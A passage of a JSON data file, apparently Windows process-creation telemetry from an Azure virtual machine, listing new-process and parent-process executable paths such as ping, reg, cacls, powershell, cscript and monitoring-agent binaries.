:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\windows\\\\system32\\\\wsqmcons.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\usoclient.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\reg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cacls.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\rundll32.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiapsrv.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiapsrv.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiapsrv.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\netcfg.exe\",\"c:\\\\windows\\\\system32\\\\ping.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\servic~2\\\\networ~1\\\\appdata\\\\local\\\\temp\\\\mpam-d3ea18d4.exe\",\"c:\\\\windows\\\\servic~2\\\\networ~1\\\\appdata\\\\local\\\\temp\\\\90875aaa-9256-468e-a6b3-041d325c6594\\\\mpsigstub.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiadap.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\",\"c:\\\\windows\\\\system32\\\\wuauclt.exe\",\"c:\\\\windows\\\\softwaredistribution\\\\download\\\\install\\\\am_delta.exe\",\"c:\\\\windows\\\\system32\\\\mpsigstub.exe\",\"c:\\\\windows\\\\system32\\\\wermgr.exe\"],\"new_process_lc_par\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\unlodctr.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\csc.exe\",\"c:\\\\windows\\\\microsoft.net\\\\framework64\\\\v4.0.30319\\\\csc.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\lodctr.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\windows\\\\system32\\\\cscript.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\mof\\\\mofwriter.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3490\\\\windowsosbinaries\\\\dsc\\\\asmhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\monitoring host temporary files 60\\\\3473\\\\webbinaries\\\\microsoft.sirona.oms.security.baselineassessment.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program 